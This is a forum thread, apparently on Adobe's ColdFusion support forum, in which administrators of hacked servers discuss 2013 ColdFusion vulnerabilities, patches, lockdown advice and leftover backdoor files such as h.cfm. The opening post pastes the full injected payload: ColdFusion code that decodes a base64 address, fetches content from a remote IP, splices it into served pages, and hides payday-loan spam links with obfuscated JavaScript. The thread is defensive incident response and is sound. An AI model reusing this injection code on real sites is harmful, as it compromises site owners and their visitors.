Copy link to clipboard
Copied
Yesterday some of our hosted sites were hacked using code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.
Here's the hack:
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
</head>
<body>
<br>
<br>
<br>
<br>
<center>
<a href="http://www.thehiltonorlando.com/">This page has moved. Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
<p class="zdroq">
Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>
</center>
</body>
</html>
Thanks in advance.
--Jeremy
Copy link to clipboard
Copied
Hi Jeremy
Can you please provide the CVE code?
Regards
Swaraj
Copy link to clipboard
Copied
These are for CF9 and 10. I've found nothing for CF8 yet.
CVE-2013-0625, CVE-2013-0629, CVE-2013-0631 and CVE-2013-0632
http://www.adobe.com/support/security/bulletins/apsb13-03.html
Copy link to clipboard
Copied
Hi Jeremy
Below lines are mentioned in the article:
Note that ColdFusion customers using an unsupported version of ColdFusion (including ColdFusion 8.x and earlier) can protect themselves from CVE-2013-0625, CVE-2013-0629 and CVE-2013-0632 by configuring the following:
Can you please try them?
Regards
Swaraj
Copy link to clipboard
Copied
Swaraj, thanks for the quick response. I'll apply these patches and settings asap.
--Jeremy
Copy link to clipboard
Copied
My company is running CF 9.0 ad we patched our servers last week. However, we got hacked this weekend as well. They added that code, plus a javaScript snippet to every index.cfm file on our server (hundres of files).
RDS is disabled, there is now an RDS password, and the CF Admin has a password. If anyone has any information on how these hackers got in it would be greatly appreciated.
Copy link to clipboard
Copied
Yes, I would like to know how this all happens as well - this hacking business in CF. Any clues/?
We are going to install the patch tomorrow when my network guy gets in. It worries me that sduncanute has installed already and is still having issues.
Copy link to clipboard
Copied
Part of the issue *may* be related to having the cfide/administrator folder exposed to outside users. Be sure you block remote access to that folder and perhaps also the cfide/adminapi folder (which is where I got hacked).
NOTE: Blocking the /cfide folder may break some CF features, like CFFORM, so leave access for that.
I am not sure this will work, but it may help.
Copy link to clipboard
Copied
I just had a crazy morning trying to figure out why our site was breaking, posting crazy text, ruining our redirect to mobile site, etc. Then I found this post and saw the code that I discovered on our site with Firebug that matched exactly what you posted. We are running CF9, and you say there is a patch? Where might we find that?
Thanks for your help.
Copy link to clipboard
Copied
The CF9 patch is here : http://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-03.html
Copy link to clipboard
Copied
I had this same problem this morning, and I am running 9.0.1 and already have hf901-00008.jar installed.. which means I have that patch already. Any other ideas??
Copy link to clipboard
Copied
Hi PocoDiablo and sduncanute
Have you had chance to apply this http://www.adobe.com/support/security/bulletins/apsb13-03.html for the same reasons?
Regegards
Swaraj
Copy link to clipboard
Copied
Albusteck,
As noted, I have gone through that bulletin and I am running the latest jar file. I've already done everything on that list. Now what? This was patched weeks ago.
Sue
Copy link to clipboard
Copied
Hi Swaraj, I did in fact apply that patch to my servers last Monday.
Copy link to clipboard
Copied
Those that have already applied the latest patch on CF9/10 but have been hacked, do you have a file /CFIDE/h.cfm /CFIDE/i.cfm or /CFIDE/help.cfm it is possible you had already been hit before applying the patch and still had a backdoor on your server. Note the file could be pretty much anywhere but under /CFIDE somewhere is a likley location.
It is also possible that you have common third party software with a vulnerability that was hit, among many other things. It would be a good idea to review the web server logs around the time of the incident to see if you can uncover anything.
If you find something that appears to be a new exploit you should send it to the Adobe Product Security Incident Response Team rather than posting it here: http://www.adobe.com/support/security/alertus.html
In addition to applying patches you should also follow the ColdFusion Lockdown Guides:
Pete Freitag,
HackMyCF.com
Copy link to clipboard
Copied
Pete,
I have contacted Adobe and sent them off a bunch of my files at their request. I just saw this message and went looking and yes, I had the h.cfm in my CFIDE root directory with a December 25th date.
I found those lockdown guides not long ago and have gone through all of it for our new server, but didn't for this one.
Any other files I should be looking for?
Copy link to clipboard
Copied
Pete, my server does indeed have those files - /CFIDE/h.cfm /CFIDE/i.cfm.
They appeared on 1/2/2013, which is significantly after the previously mentioned hotfix released on Jan 15th, 2013:
http://www.adobe.com/support/security/bulletins/apsb13-03.html
Copy link to clipboard
Copied
So, I have located the h.cfm and i.cfm files. What are you suggesting to do with these files?
Copy link to clipboard
Copied
If you have the /CFIDE/h.cfm or /CFIDE/i.cfm files they are not part of ColdFusion, and were placed there by an attacker. So you should delete them! You should probably do a fresh OS, CF install at this point, be sure to use new passwords for everything.
There have been reports of files being added under the /CFIDE/adminapi directory as well in recent attacks, so you will want to look there as well (check file timestamps on all your files in CFIDE), but as I said consider doing a full reinstall.
--
Pete Freitag
HackMyCF.com - ColdFusion Server Security Scanner
FuseGaurd.com - Web Application Firewall for ColdFusion
Copy link to clipboard
Copied
There is a file called fusebox.cfm with a time stamp date of 2/6/13 in the adminapi/customtags directory. Is this legit? And if so, what is it?
Also a file called adss.cfm with a 2/3/13 time stamp in the same directory. This seems to be part of the attack. Can you verify this to be true?
Thanks.
Copy link to clipboard
Copied
These files are part of the hack. Make a copy of these and then delete them. I kept a copy of everything so that I can share the info with Adobe, who are following up with this.
Do a search on your whole server for anything else that has those date stamps that looks wierd.
I zapped my entire website and restored it, and then went through all of the log files, and the whole Cold Fusion installation looking for odd items.
We are moving to a new server as soon as I finish migrating my Access databases to MS SQL, otherwise I would be doing a full re-install.
Sue
Copy link to clipboard
Copied
The h.cfm file was added to my server on 11/17/2012. This was done by creating a scheduled task, running it, and then deleting the task so I would not see it. Yes, my /administrator and /adminapi directories were still available. I realize I've been too lax -- have been using ColdFusion for over a decade with no major security issues, so I didn't pay close attention to locking out these directories to public IP addresses.
The h.cfm file was called several times over December and January, but nothing else was done.
On 2/3 some text was added to several index.cfm pages, but they were not the default pages and therefore the attack didn't take down the server.
I removed h.cfm, i.cfm, fusebox.com and adss.cfm. I renamed h.cfm, found the password inside it, and tried it. I was able to see what the attacker could see. Passwords for data sources, in particular, were available.
After plugging the hole, then removing the files, I would suggest changing all datasource passwords, as the attackers would have gained access to them.
Copy link to clipboard
Copied
Will restricting access to the CFIDE folder prevent this exploit, or is it more involved than that?
Copy link to clipboard
Copied
My server was also hacked with the "payday loans" code appearing on most index.cfm and index.html pages. After deleteing the injected code, it reappeared 3 days later. I believe I have since discovered the real culprit -- a modified application.cfm in the CFIDE directory.
Copy link to clipboard
Copied
EcleticDan - what version of CF were your running, and were you fully patched? Any suggestions on what we can do to protect ourselves? I locked out /cfide/administrator so no one can get to it unless you RDC to the server.